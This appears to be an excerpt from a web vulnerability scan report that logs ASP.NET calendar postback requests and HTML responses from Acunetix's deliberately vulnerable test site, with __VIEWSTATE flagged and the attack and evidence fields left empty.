Request Body - size: 1,125 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8218&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOKT0WtoIHgJTRBYBBgDAoc69W9oIZGRkowLyOxWpwKo0jk95pY38xG9VqlM%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLO1v3eAgK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ%2FfNlUcu7eWaikBJfb13fyE0Bfovg%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:55:24 GMT Content-Length: 12462
Response Body - size: 12,462 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOKT0WtoIHgJTRBYBBgDAoc69W9oIZGRkowLyOxWpwKo0jk95pY38xG9VqlM=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLO1v3eAgK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q/fNlUcu7eWaikBJfb13fyE0Bfovg==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:White" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1129 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,129 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8222&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOKT0WtoIHgJTRBYBBgDASHjiXtoIZGRkbsmNLLGTKDb0We%2BMM23DZBgPfZM%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLIgc%2FXAgK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ%2ByNr2aFOW1IxFk8HMci5eZu4PLBA%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:06:21 GMT Content-Length: 12462
Response Body - size: 12,462 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOKT0WtoIHgJTRBYBBgDASHjiXtoIZGRkbsmNLLGTKDb0We+MM23DZBgPfZM=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLIgc/XAgK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q+yNr2aFOW1IxFk8HMci5eZu4PLBA==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:White" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1125 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
